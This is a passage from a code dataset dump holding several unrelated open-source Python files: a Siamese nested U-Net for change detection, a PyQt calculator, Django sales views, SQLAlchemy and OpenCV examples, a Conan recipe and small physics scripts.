filters[2], filters[1] * 3 )\n self.conv2_2 = conv_block_nested(filters[2] * 3 + filters[3], filters[2], filters[2])\n self.AE2_2 = Attention_Embedding(filters[3], filters[2] * 3)\n\n self.conv0_3 = conv_block_nested(filters[0] * 4 + filters[1], filters[0], filters[0])\n self.AE0_3 = Attention_Embedding(filters[1], filters[0] * 4 )\n self.conv1_3 = conv_block_nested(filters[1] * 4 + filters[2], filters[1], filters[1])\n self.AE1_3 = Attention_Embedding(filters[2], filters[1] * 4 )\n\n self.conv0_4 = conv_block_nested(filters[0] * 5 + filters[1], filters[0], filters[0])\n self.AE0_4 = Attention_Embedding( filters[1], filters[0] * 5)\n\n\n self.Up1_0 = up(filters[1])\n self.Up2_0 = up(filters[2])\n self.Up3_0 = up(filters[3])\n self.Up4_0 = up(filters[4])\n\n self.Up1_1 = up(filters[1])\n self.Up2_1 = up(filters[2])\n self.Up3_1 = up(filters[3])\n\n self.Up1_2 = up(filters[1])\n self.Up2_2 = up(filters[2])\n self.Up1_3 = up(filters[1])\n\n self.ca = ChannelAttention(filters[0] * 4, ratio=8)\n self.ca1 = ChannelAttention(filters[0], ratio=16 // 4)\n self.conv_final = nn.Conv2d(filters[0] * 4, out_ch, kernel_size=1)\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, (nn.BatchNorm2d, 
nn.GroupNorm)):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n\n def forward(self,xB,xA):\n '''xA'''\n x0_0A = self.conv0_0(xA)\n x1_0A = self.conv1_0(self.pool(x0_0A))\n x2_0A = self.conv2_0(self.pool(x1_0A))\n x3_0A = self.conv3_0(self.pool(x2_0A))\n x4_0A = self.conv4_0(self.pool(x3_0A))\n\n '''xB'''\n x0_0B = self.conv0_0(xB)\n x1_0B = self.conv1_0(self.pool(x0_0B))\n x2_0B = self.conv2_0(self.pool(x1_0B))\n x3_0B = self.conv3_0(self.pool(x2_0B))\n x4_0B = self.conv4_0(self.pool(x3_0B))\n\n x0_1 = self.AE0_1(torch.cat([x1_0A, x1_0B], 1), torch.cat([x0_0A, x0_0B], 1))\n x0_1 = self.conv0_1(torch.cat([x0_1, self.Up1_0(x1_0B)], 1))\n\n x1_1 = self.AE1_1(torch.cat([x2_0A, x2_0B], 1), torch.cat([x1_0A, x1_0B], 1))\n x1_1 = self.conv1_1(torch.cat([x1_1,self.Up2_0(x2_0B)], 1))\n\n x0_2 = self.AE0_2(x1_1, torch.cat([x0_0A, x0_0B, x0_1], 1))\n x0_2 = self.conv0_2(torch.cat([x0_2,self.Up1_1(x1_1)], 1))\n\n x2_1 = self.AE2_1(torch.cat([x3_0A, x3_0B], 1), torch.cat([x2_0A, x2_0B], 1))\n x2_1 = self.conv2_1(torch.cat([x2_1,self.Up3_0(x3_0B)], 1))\n\n x1_2 = self.AE1_2(x2_1, torch.cat([x1_0A, x1_0B, x1_1], 1))\n x1_2 = self.conv1_2(torch.cat([x1_2, self.Up2_1(x2_1)], 1))\n\n x0_3 = self.AE0_3(x1_2, torch.cat([x0_0A, x0_0B, x0_1, x0_2], 1))\n x0_3 = self.conv0_3(torch.cat([x0_3, self.Up1_2(x1_2)], 1))\n\n x3_1 = self.AE3_1(torch.cat([x4_0A, x4_0B], 1), torch.cat([x3_0A, x3_0B], 1))\n x3_1 = self.conv3_1(torch.cat([x3_1, self.Up4_0(x4_0B)], 1))\n x2_2 = self.AE2_2(x3_1, torch.cat([x2_0A, x2_0B, x2_1], 1))\n x2_2 = self.conv2_2(torch.cat([x2_2, self.Up3_1(x3_1)], 1))\n x1_3 = self.AE1_3(x2_2, torch.cat([x1_0A, x1_0B, x1_1, x1_2], 1))\n x1_3 = self.conv1_3(torch.cat([x1_3, self.Up2_2(x2_2)], 1))\n x0_4 = self.AE0_4(x1_3, torch.cat([x0_0A, x0_0B, x0_1, x0_2, x0_3], 1))\n x0_4 = self.conv0_4(torch.cat([x0_4, self.Up1_3(x1_3)], 1))\n\n\n out = torch.cat([x0_1, x0_2, x0_3, x0_4], 1)\n\n intra = torch.sum(torch.stack((x0_1, x0_2, x0_3, x0_4)), dim=0)\n ca1 = self.ca1(intra)\n out = self.ca(out) * (out + ca1.repeat(1, 4, 1, 1))\n #out = sa*out+out\n out = self.conv_final(out)\n\n return out\n\n\nclass Siam_NestedUNet_Conc(nn.Module):\n # SNUNet-CD without Attention\n def __init__(self, in_ch=3, out_ch=2):\n super(Siam_NestedUNet_Conc, self).__init__()\n torch.nn.Module.dump_patches = True\n n1 = 32 # the initial number of channels of feature map\n filters = [n1, n1 * 2, n1 * 4, n1 * 8, n1 * 16]\n\n self.pool = nn.MaxPool2d(kernel_size=2, stride=2)\n\n self.conv0_0 = conv_block_nested(in_ch, filters[0], filters[0])\n self.conv1_0 = conv_block_nested(filters[0], filters[1], filters[1])\n self.Up1_0 = up(filters[1])\n self.conv2_0 = conv_block_nested(filters[1], filters[2], filters[2])\n self.Up2_0 = up(filters[2])\n self.conv3_0 = conv_block_nested(filters[2], filters[3], filters[3])\n self.Up3_0 = up(filters[3])\n self.conv4_0 = conv_block_nested(filters[3], filters[4], filters[4])\n self.Up4_0 = up(filters[4])\n\n self.conv0_1 = conv_block_nested(filters[0] * 2 + filters[1], filters[0], filters[0])\n self.conv1_1 = conv_block_nested(filters[1] * 2 + filters[2], filters[1], filters[1])\n self.Up1_1 = up(filters[1])\n self.conv2_1 = conv_block_nested(filters[2] * 2 + filters[3], filters[2], filters[2])\n self.Up2_1 = up(filters[2])\n self.conv3_1 = conv_block_nested(filters[3] * 2 + filters[4], filters[3], filters[3])\n self.Up3_1 = up(filters[3])\n\n self.conv0_2 = conv_block_nested(filters[0] * 3 + filters[1], filters[0], filters[0])\n self.conv1_2 = conv_block_nested(filters[1] * 3 + 
filters[2], filters[1], filters[1])\n self.Up1_2 = up(filters[1])\n self.conv2_2 = conv_block_nested(filters[2] * 3 + filters[3], filters[2], filters[2])\n self.Up2_2 = up(filters[2])\n\n self.conv0_3 = conv_block_nested(filters[0] * 4 + filters[1], filters[0], filters[0])\n self.conv1_3 = conv_block_nested(filters[1] * 4 + filters[2], filters[1], filters[1])\n self.Up1_3 = up(filters[1])\n\n self.conv0_4 = conv_block_nested(filters[0] * 5 + filters[1], filters[0], filters[0])\n\n self.final1 = nn.Conv2d(filters[0], out_ch, kernel_size=1)\n self.final2 = nn.Conv2d(filters[0], out_ch, kernel_size=1)\n self.final3 = nn.Conv2d(filters[0], out_ch, kernel_size=1)\n self.final4 = nn.Conv2d(filters[0], out_ch, kernel_size=1)\n self.conv_final = nn.Conv2d(out_ch * 4, out_ch, kernel_size=1)\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n\n def forward(self, xA, xB):\n '''xA'''\n x0_0A = self.conv0_0(xA)\n x1_0A = self.conv1_0(self.pool(x0_0A))\n x2_0A = self.conv2_0(self.pool(x1_0A))\n x3_0A = self.conv3_0(self.pool(x2_0A))\n # x4_0A = self.conv4_0(self.pool(x3_0A))\n '''xB'''\n x0_0B = self.conv0_0(xB)\n x1_0B = self.conv1_0(self.pool(x0_0B))\n x2_0B = self.conv2_0(self.pool(x1_0B))\n x3_0B = self.conv3_0(self.pool(x2_0B))\n x4_0B = self.conv4_0(self.pool(x3_0B))\n\n x0_1 = self.conv0_1(torch.cat([x0_0A, x0_0B, self.Up1_0(x1_0B)], 1))\n x1_1 = self.conv1_1(torch.cat([x1_0A, x1_0B, self.Up2_0(x2_0B)], 1))\n x0_2 = self.conv0_2(torch.cat([x0_0A, x0_0B, x0_1, self.Up1_1(x1_1)], 1))\n\n\n x2_1 = self.conv2_1(torch.cat([x2_0A, x2_0B, self.Up3_0(x3_0B)], 1))\n x1_2 = self.conv1_2(torch.cat([x1_0A, x1_0B, x1_1, self.Up2_1(x2_1)], 1))\n x0_3 = self.conv0_3(torch.cat([x0_0A, x0_0B, x0_1, x0_2, self.Up1_2(x1_2)], 1))\n\n x3_1 = self.conv3_1(torch.cat([x3_0A, x3_0B, self.Up4_0(x4_0B)], 1))\n x2_2 = self.conv2_2(torch.cat([x2_0A, x2_0B, x2_1, self.Up3_1(x3_1)], 1))\n x1_3 = self.conv1_3(torch.cat([x1_0A, x1_0B, x1_1, x1_2, self.Up2_2(x2_2)], 1))\n x0_4 = self.conv0_4(torch.cat([x0_0A, x0_0B, x0_1, x0_2, x0_3, self.Up1_3(x1_3)], 1))\n\n\n output1 = self.final1(x0_1)\n output2 = self.final2(x0_2)\n output3 = self.final3(x0_3)\n output4 = self.final4(x0_4)\n output = self.conv_final(torch.cat([output1, output2, output3, output4], 1))\n return (output1, output2, output3, output4, output)","repo_name":"lixinghua5540/DTCDN","sub_path":"Change detection/Models/Sun_Net.py","file_name":"Sun_Net.py","file_ext":"py","file_size_in_byte":20231,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"77"} +{"seq_id":"14867164024","text":"\n# Experiment to see how many objects the simulator can handle\n# with reasonable speed.\n\nimport gravity\n\nL = []\nfor i in range(20):\n b = gravity.Body()\n b.name = str(i)\n b.mass = 10**26\n b.px = gravity.AU * (i/25)\n b.vy = ((i % 10) - 5) * 2000\n b.vx = ((i % 4) - 2) * 500\n L.append(b)\n\ngravity.loop(L)\n","repo_name":"akuchling/50-examples","sub_path":"code/experiments/many-gravity.py","file_name":"many-gravity.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"77"} +{"seq_id":"24396529373","text":"from PyQt5 import QtWidgets, uic\nimport pkg_resources\ndef main():\n #vytvoreni aplikace a okna\n app=QtWidgets.QApplication([])\n 
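# --- Editor's aside (hedged sketch): the calculator below recomputes on every
# valueChanged/currentTextChanged signal. The same wiring in miniature, runnable
# without a .ui file:
from PyQt5 import QtWidgets

app = QtWidgets.QApplication([])
spin = QtWidgets.QDoubleSpinBox()
spin.valueChanged.connect(lambda v: print('value is now', v))
spin.setValue(3.5)  # emits valueChanged synchronously: "value is now 3.5"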
window=QtWidgets.QDialog()\n # load the widgets\n #with open('kalkulacka/kalkulacka.ui',encoding='UTF-8') as f: # f is the file; with closes it automatically; first version with a direct path\n with pkg_resources.resource_stream('kalkulacka','kalkulacka.ui') as f: # second version for packaging: takes the module name and a file at the same level, next to it\n uic.loadUi(f,window)\n\n sb_operand1=window.findChild(QtWidgets.QDoubleSpinBox,'sb_operand1')\n cb_operator=window.findChild(QtWidgets.QComboBox,'cb_operator')\n sb_operand2=window.findChild(QtWidgets.QDoubleSpinBox,'sb_operand2')\n sb_result=window.findChild(QtWidgets.QDoubleSpinBox,'sb_result')\n sb_operand2.setValue(123)\n\n def calculate():\n operand1=sb_operand1.value()\n operand2=sb_operand2.value()\n operator=cb_operator.currentText()\n try:\n if operator=='+':\n result=operand1+operand2\n elif operator=='-':\n result=operand1-operand2\n elif operator=='/':\n result=operand1/operand2\n elif operator=='*':\n result=operand1*operand2\n else:\n raise ValueError('bad operator')\n except Exception:\n sb_result.setPrefix('ERR') # show the error, e.g. on division by zero\n sb_result.setValue(0)\n else:\n sb_result.setPrefix('') # clear ERR\n sb_result.setValue(result)\n\n sb_operand1.valueChanged.connect(calculate)\n sb_operand2.valueChanged.connect(calculate)\n cb_operator.currentTextChanged.connect(calculate)\n\n\n # Run\n window.show()\n return app.exec()\n","repo_name":"libusepoustkova/kalkulacka","sub_path":"kalkulacka/logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15221988474","text":"\nimport json\nimport plistlib\nimport os\n\nfrom contextlib import contextmanager\n\nclass BaseConfig(object):\n \"\"\"\n Holds the configuration data for a given base project.\n \"\"\"\n def __init__(self, display_name, bundle_id,\n app_transport_exception=None, facebook_app_id=None):\n self.display_name = display_name\n self.bundle_id = bundle_id\n self.app_transport_exception = app_transport_exception\n self.facebook_app_id = facebook_app_id\n\n def to_dict(self):\n config_dict = {\n 'display_name': self.display_name,\n 'bundle_id': self.bundle_id,\n 'app_transport_exception': self.app_transport_exception,\n 'facebook_app_id': self.facebook_app_id\n }\n return config_dict\n\n def to_json(self):\n return json.dumps(self.to_dict())\n\nclass BaseProject(object):\n \"\"\"\n Initialize with a directory path to a base project.\n \"\"\"\n def __init__(self, directory):\n self.directory = directory\n self.info = os.path.join(self.directory, 'SiphonBase', 'Info.plist')\n\n @contextmanager\n def configure(self, config):\n \"\"\"\n Temporarily configure a base project\n \"\"\"\n with open(self.info, 'r') as f:\n info = f.read()\n try:\n self.set_bundle_id(config.bundle_id)\n self.set_display_name(config.display_name)\n self.set_facebook_sdk_info(config.facebook_app_id,\n config.display_name)\n self.set_app_transport_exception(config.app_transport_exception)\n yield\n finally:\n with open(self.info, 'w') as f:\n f.write(info)\n\n def set_bundle_id(self, bundle_id):\n self.set_info('CFBundleIdentifier', bundle_id)\n\n def set_display_name(self, display_name):\n self.set_info('CFBundleDisplayName', display_name)\n\n def set_app_transport_exception(self, domain):\n key = 'NSAppTransportSecurity'\n value = {'NSAllowsArbitraryLoads': False}\n if domain:\n value['NSExceptionDomains'] = {\n domain: {\n 
'NSTemporaryExceptionAllowsInsecureHTTPLoads': True\n }\n }\n self.set_info(key, value)\n\n def set_facebook_sdk_info(self, fb_app_id, fb_display_name):\n # If the app id is not set, do nothing\n if not fb_app_id:\n return\n\n with open(self.info, 'r') as f:\n contents = f.read()\n\n # Handle updated template variables\n processed = contents.replace('{{facebook-app-id}}', fb_app_id)\n processed = processed.replace('facebook.app.id.placeholder', fb_app_id) # chain from processed, not contents, or the first replace is lost\n processed = processed.replace('{{facebook-display-name}}',\n fb_display_name)\n processed = processed.replace('facebook.display.name.placeholder',\n fb_display_name)\n\n with open(self.info, 'w') as f:\n # Replace our template vars {{facebook-app-id}} and\n # {{facebook-display-name}}\n f.write(processed)\n\n def set_info(self, k, v):\n \"\"\"\n Set a value for a given key in an app's base project info.plist\n \"\"\"\n info = self.get_info()\n\n with open(self.info, 'wb') as f:\n # Note that we have to write the entire contents to the file,\n # so we load the current data, add whatever we need to it, then dump\n info[k] = v\n plistlib.dump(info, f)\n\n def get_info(self, k=None):\n \"\"\"\n Get the value for a key in an app's base project info.plist\n \"\"\"\n info = None\n with open(self.info, 'rb') as f:\n info = plistlib.load(f)\n if k:\n return info.get(k)\n else:\n return info\n","repo_name":"siphoncode/siphon-cli","sub_path":"siphon/cli/wrappers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41643265312","text":"# django\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.urls import reverse_lazy, reverse\nfrom django.views.generic import (\n View,\n UpdateView,\n DeleteView,\n DetailView,\n ListView\n)\nfrom django.views.generic.edit import (\n FormView\n)\n# local\nfrom applications.producto.models import Product\nfrom applications.utils import render_to_pdf\nfrom applications.users.mixins import VentasPermisoMixin\n#\nfrom .models import Sale, SaleDetail, CarShop\nfrom .forms import VentaForm, VentaVoucherForm\nfrom .functions import procesar_venta\n\n\nclass AddCarView(VentasPermisoMixin, FormView):\n template_name = 'venta/index.html'\n form_class = VentaForm\n success_url = '.'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"productos\"] = CarShop.objects.all()\n context[\"total_cobrar\"] = CarShop.objects.total_cobrar()\n # form for a sale with a payment voucher\n context['form_voucher'] = VentaVoucherForm\n return context\n \n def form_valid(self, form):\n \"\"\" Validates the form data \"\"\"\n # Take the values coming from the form\n barcode = form.cleaned_data['barcode']\n count = form.cleaned_data['count']\n # If the product was already added, add to its quantity; otherwise add it to the sale as a new item\n obj, created = CarShop.objects.get_or_create(\n barcode=barcode,\n defaults={\n 'product': Product.objects.get(barcode=barcode),\n 'count': count\n }\n )\n #\n if not created:\n obj.count = obj.count + count\n obj.save()\n return super(AddCarView, self).form_valid(form)\n \n\n
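# --- Editor's aside (hedged sketch): set_info/get_info in base.py above are a
# plistlib read-modify-write; plistlib.load/dump operate on binary file objects,
# which an in-memory buffer can stand in for:
import io
import plistlib

buf = io.BytesIO()
plistlib.dump({'CFBundleDisplayName': 'Demo'}, buf)
buf.seek(0)
info = plistlib.load(buf)
info['CFBundleIdentifier'] = 'com.example.demo'  # illustrative bundle id
print(info)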
class CarShopUpdateView(VentasPermisoMixin, View):\n \"\"\" Decrements the quantity of a cart (carshop) item by 1 \"\"\"\n\n def post(self, request, *args, **kwargs):\n car = CarShop.objects.get(id=self.kwargs['pk'])\n if car.count > 1:\n car.count = car.count - 1\n car.save()\n #\n return HttpResponseRedirect(\n reverse(\n 'venta_app:venta-index'\n )\n )\n\n\nclass CarShopDeleteView(VentasPermisoMixin, DeleteView):\n \"\"\" Clears everything from the cart \"\"\"\n model = CarShop\n success_url = reverse_lazy('venta_app:venta-index')\n\n\nclass CarShopDeleteAll(VentasPermisoMixin, View):\n \n def post(self, request, *args, **kwargs):\n #\n CarShop.objects.all().delete()\n #\n return HttpResponseRedirect(\n reverse(\n 'venta_app:venta-index'\n )\n )\n\n\nclass ProcesoVentaSimpleView(VentasPermisoMixin, View):\n \"\"\" Processes a simple sale: NO PRINTING, NO PAYMENT RECEIPT \"\"\"\n\n def post(self, request, *args, **kwargs):\n #\n procesar_venta(\n self=self,\n type_invoce=Sale.SIN_COMPROBANTE,\n type_payment=Sale.CASH,\n user=self.request.user,\n )\n #\n return HttpResponseRedirect(\n reverse(\n 'venta_app:venta-index'\n )\n )\n\n\nclass ProcesoVentaVoucherView(VentasPermisoMixin, FormView):\n form_class = VentaVoucherForm\n success_url = '.'\n \n def form_valid(self, form):\n type_payment = form.cleaned_data['type_payment']\n type_invoce = form.cleaned_data['type_invoce']\n #\n venta = procesar_venta(\n self=self,\n type_invoce=type_invoce,\n type_payment=type_payment,\n user=self.request.user,\n )\n #\n if venta: \n return HttpResponseRedirect(\n reverse(\n 'venta_app:venta-voucher_pdf',\n kwargs={'pk': venta.pk },\n )\n )\n else:\n return HttpResponseRedirect(\n reverse(\n 'venta_app:venta-index'\n )\n )\n \n\n\nclass VentaVoucherPdf(VentasPermisoMixin, View):\n \n def get(self, request, *args, **kwargs):\n venta = Sale.objects.get(id=self.kwargs['pk'])\n data = {\n 'venta': venta,\n 'detalle_productos': SaleDetail.objects.filter(sale__id=self.kwargs['pk'])\n }\n pdf = render_to_pdf('venta/voucher.html', data)\n return HttpResponse(pdf, content_type='application/pdf')\n\n\nclass SaleListView(VentasPermisoMixin, ListView):\n template_name = 'venta/ventas.html'\n context_object_name = \"ventas\" \n\n def get_queryset(self):\n return Sale.objects.ventas_no_cerradas()\n \nclass SaleDeleteView(VentasPermisoMixin, DetailView):\n template_name = 'venta/delete.html'\n model = Sale\n\nclass SaleAnulateView(VentasPermisoMixin, View):\n \"\"\" Voids the sale without deleting it from the DB. Returns the products to\n stock and subtracts from the products' sales count \"\"\"\n def post(self, request, *args, **kwargs):\n sale = Sale.objects.get(id = self.kwargs['pk'])\n
# Not actually deleted from the database, only marked as voided, for auditing purposes\n sale.anulate = True\n sale.save()\n # update the stock and sales counters\n SaleDetail.objects.restablecer_stok_num_ventas(sale.id)\n return HttpResponseRedirect(\n reverse(\n 'venta_app:venta-list'\n )\n )","repo_name":"AdrianSilvaTj/djmarket","sub_path":"market/applications/venta/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71625632570","text":"from sqlalchemy import *\n\nfrom sqlalchemy.orm import *\n\n#Settings to connect to mysql database\n\ndatabase_setting={\n 'database_type':'mysql',\n 'connector':'pymysql',\n 'user_name':'root',\n 'password':'admin',\n 'host_name':'192.168.44.143',\n 'database_name':'testsql',\n 'charset':'utf8',\n 'echo':'True'\n\n\n}\n\nclass User(object):\n def __init__(self,user_name,user_age,user_sex,user_score,user_subject):\n\n self.user_name=user_name\n self.user_age=user_age\n self.user_sex=user_sex\n self.user_score=user_score\n self.user_subject=user_subject\n\n\nclass UserManagerORM():\n def __init__(self):\n\n self.engine=create_engine(\n database_setting['database_type']+'+'+\n database_setting['connector']+'://'+\n database_setting['user_name']+':'+\n database_setting['password']+'@'+\n database_setting['host_name']+'/'+\n database_setting['database_name']\n\n\n\n )\n\n self.metadata=MetaData(self.engine)\n #\n self.user_table=Table('user',self.metadata,autoload=True)\n mapper(User,self.user_table)\n self.Session=sessionmaker()\n self.Session.configure(bind=self.engine)\n self.session=self.Session()\n\n def CreateNewUser(self,user_info):\n new_user=User(\n user_info['user_name'],\n user_info['user_age'],\n user_info['user_sex'],\n user_info['user_score'],\n user_info['user_subject']\n )\n\n\n\n self.session.add(new_user)\n self.session.commit()\n \n def GetUserByName(self,user_name):\n return self.session.query(User).filter_by(\n user_name=user_name\n ).all()[0]\n\n\n def GetAllUser(self):\n return self.session.query(User)\n\n\n def UpdateUserInfoByName(self,user_info):\n user_name=user_info['user_name']\n user_info_without_name={'user_age':user_info['user_age'],\n 'user_sex':user_info['user_sex'],\n 'user_score':user_info['user_score'],\n 'user_subject':user_info['user_subject']\n }\n\n self.session.query(User).filter_by(user_name=user_name).update(\n user_info_without_name\n )\n self.session.commit()\n\n def DeleteUserByName(self,user_name):\n user_need_to_delete=self.session.query(User).filter_by(user_name=user_name).all()[0]\n\n self.session.delete(user_need_to_delete)\n self.session.commit()\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"tonywyl/tornado-","sub_path":"app01/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15805148196","text":"from django.urls import path\nfrom . 
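# --- Editor's aside (hedged sketch): the Table(...)/mapper(...) reflection in
# UserManagerORM above is SQLAlchemy's legacy "classical" mapping; in SQLAlchemy
# 1.4+ the declarative style expresses the same user table as a class (column
# names are illustrative, mirroring the fields used above):
from sqlalchemy import Column, Integer, String
from sqlalchemy.orm import declarative_base

Base = declarative_base()

class UserDeclarative(Base):
    __tablename__ = 'user'
    id = Column(Integer, primary_key=True)
    user_name = Column(String(64))
    user_age = Column(Integer)
    user_sex = Column(String(8))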
import views\n\napp_name = 'analytics'\n\nurlpatterns = [\n path('', views.analytics_view, name='analytics'),\n path('/', views.analytics_view, name='analytics_add'),\n path('fetch-sticky-notes/', views.fetch_sticky_notes, name='fetch_sticky_notes'),\n path('create-or-add-to-board/', views.create_or_add_to_board, name='create_or_add_to_board'),\n path('board//sticky-notes/', views.fetch_board_sticky_notes, name='fetch_board_sticky_notes'),\n path('delete-sticky-note//', views.delete_sticky_note_from_board, name='delete_sticky_note_from_board'),\n path('/save_board/', views.save_board, name='save_board'),\n path('user_boards//', views.fetch_user_boards, name='fetch_user_boards'),\n]\n","repo_name":"MasterMind7777777/Finance-tracker","sub_path":"finance_tracker/analytics/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71846978808","text":"# Model from Bruggen and Scannapieco 2016\nfrom numpy import sqrt, log10, log, exp\nfrom numpy import genfromtxt\n\nconst_A = 0.01\nconst_etac = 0.5\nconst_Tevap = 3.e6\nconst_cevap = 263.0\ngamma_minus1 = 2./3.\ngamma_plus1 = 8./3.\ngamma = 5./3.\nconst_etashock = 0.4\nconst_etarocket = 0.6\n\nchi0 = 300.0\nMach = 6.46\nNc = 1.5e20\nvh = 1700.0\n# mlr defined as (dm/dt)/m * tcc\ndef find_tevap(chi0, Mach, Nc):\n g = 3.5 * (const_etac / 0.5) * (const_A / 0.01) * (3.e6 / const_Tevap)\n g = g * (Nc / 3.e20) * Mach * sqrt(1000. / chi0)\n mssq = Mach * Mach\n fM = ((gamma_minus1) * mssq + 2.0) * (2.0 * gamma * mssq - gamma_minus1)\n fM = fM / (4.0 * gamma_plus1 * gamma_plus1 * mssq)\n fM = max(1.0, fM)\n mlr = const_A * fM * sqrt(chi0) * (1.0 - sqrt(1.0 + 4.0 * g)) / (2.0 * g)\n return 1./(-mlr)\n\ndef find_vc(t_evap, vh):\n v1 = const_etashock * vh / sqrt(chi0) * sqrt(Mach / 30. * t_evap)\n v2 = const_etarocket * const_cevap * sqrt(Mach / 30. 
/ t_evap)\n    return v1 + v2\n\ntab = genfromtxt(\"models_bs16_physical.dat\", names=True, dtype=('i8,S20,f8,f8,f8,f8,f8,f8'))\n\nfout = open(\"models_bs16_predictions.dat\", \"w\")\nfout.write(\"#ID	Modelname	tevap	vc\\n\")\nfor i in range(len(tab)):\n    t_evap = find_tevap(tab['chi0'][i], tab['M'][i], tab['ncRc'][i])\n    vc = find_vc(t_evap, tab['vh'][i])\n    line = \"%d %12s %4.1f %4.1f\\n\" % (i, tab['Modelname'][i], t_evap, vc)\n    fout.write(line)\nfout.close()\n","repo_name":"shuiyao/phew-py","sub_path":"physics/predictions.py","file_name":"predictions.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73669819449","text":"import cv2\nimport numpy as np\n\nimg = cv2.imread(\"dataset/sudoku.jpg\",0)\nprint(img.shape)\n\nrows,cols = img.shape\n# perspective transform: 4 input points\n# point1 p1(56,65) p2(368,52) p3(28,387) p4(389,390)\n# point2 p1(0,0) p2(300,0) p3(0,300) p4(300,300)\nw = 300\nh = 300\npts1 = np.float32([[56,65],[368,52],[28,387],[389,390]])\npts2 = np.float32([[0,0],[w,0],[0,h],[w,h]])\n\nM = cv2.getPerspectiveTransform(pts1,pts2)\nprint(M) # 3x3 matrix\nres = cv2.warpPerspective(img,M,(300,300)) # 300,300 = new img size (width,height)\ncv2.imshow(\"Original Image\",img)\ncv2.imshow(\"Result Image\",res)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"JiratchayaF/openCV_KMITL","sub_path":"Method/perspective.py","file_name":"perspective.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31936190495","text":"import os\n\nfrom conan import ConanFile\nfrom conan.errors import ConanInvalidConfiguration\nfrom conan.tools.build import check_min_cppstd\nfrom conan.tools.files import copy, get\nfrom conan.tools.layout import basic_layout\nfrom conan.tools.scm import Version\n\nrequired_conan_version = \">=1.52.0\"\n\n\nclass CppProjectFrameworkConan(ConanFile):\n    name = \"cpp_project_framework\"\n    description = \"C++ Project Framework is a framework for creating C++ projects.\"\n    license = \"AGPL-3.0\"\n    url = \"https://github.com/conan-io/conan-center-index\"\n    homepage = \"https://github.com/sheepgrass/cpp_project_framework\"\n    topics = (\"cpp\", \"project\", \"framework\", \"header-only\")\n\n    package_type = \"header-library\"\n    settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n    no_copy_source = True\n\n    @property\n    def _minimum_cpp_standard(self):\n        return 14\n\n    @property\n    def _minimum_compilers_version(self):\n        return {\n            \"Visual Studio\": \"16\",\n            \"msvc\": \"192\",\n            \"gcc\": \"7\",\n            \"clang\": \"6\",\n            \"apple-clang\": \"10\",\n        }\n\n    def layout(self):\n        basic_layout(self, src_folder=\"src\")\n\n    def package_id(self):\n        self.info.clear()\n\n    def validate(self):\n        if self.settings.os not in (\"Linux\", \"FreeBSD\", \"Windows\"):\n            raise ConanInvalidConfiguration(f\"{self.name} is only supported on Linux and Windows\")\n\n        compiler = self.settings.compiler\n\n        if compiler.get_safe(\"cppstd\"):\n            check_min_cppstd(self, self._minimum_cpp_standard)\n\n        if compiler in (\"gcc\", \"clang\"):\n            if not compiler.get_safe(\"libcxx\", \"\").startswith(\"libstdc++\"):\n                raise ConanInvalidConfiguration(f\"{self.name} is only supported {compiler} with libstdc++\")\n\n        min_version = self._minimum_compilers_version.get(str(compiler))\n        if not min_version:\n            self.output.warning(f\"{self.name} recipe lacks information about the {compiler} compiler support.\")\n        else:\n            if 
Version(compiler.version) < min_version:\n                raise ConanInvalidConfiguration(\n                    f\"{self.name} requires C++{self._minimum_cpp_standard} support. \"\n                    f\"The current compiler {compiler} {compiler.version} does not support it.\"\n                )\n\n    def source(self):\n        get(self, **self.conan_data[\"sources\"][self.version], strip_root=True)\n\n    def package(self):\n        copy(self, \"LICENSE\",\n             dst=os.path.join(self.package_folder, \"licenses\"),\n             src=self.source_folder)\n        copy(self, \"*.h\",\n             dst=os.path.join(self.package_folder, \"include\", self.name),\n             src=os.path.join(self.source_folder, self.name))\n\n    def package_info(self):\n        self.cpp_info.bindirs = []\n        self.cpp_info.libdirs = []\n","repo_name":"conan-io/conan-center-index","sub_path":"recipes/cpp_project_framework/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":2823,"program_lang":"python","lang":"en","doc_type":"code","stars":835,"dataset":"github-code","pt":"77"} +{"seq_id":"11160069529","text":"import numpy as np\nfrom numpy import cos, sin\n\n# Base Constants\nm = 3\nm1 = 1\nm2 = 1\n\nL1 = 5\nL2 = 3\n\ng = 9.8\n\nbeta = 0.5\nbeta1 = 0.2\nbeta2 = 0.2\n\n# Derived Constants\nq1 = m + m1 + m2\nq2 = (1/3*m1+m2)*L1*L1\nq3 = 1/3*m2*L2*L2\nq4 = 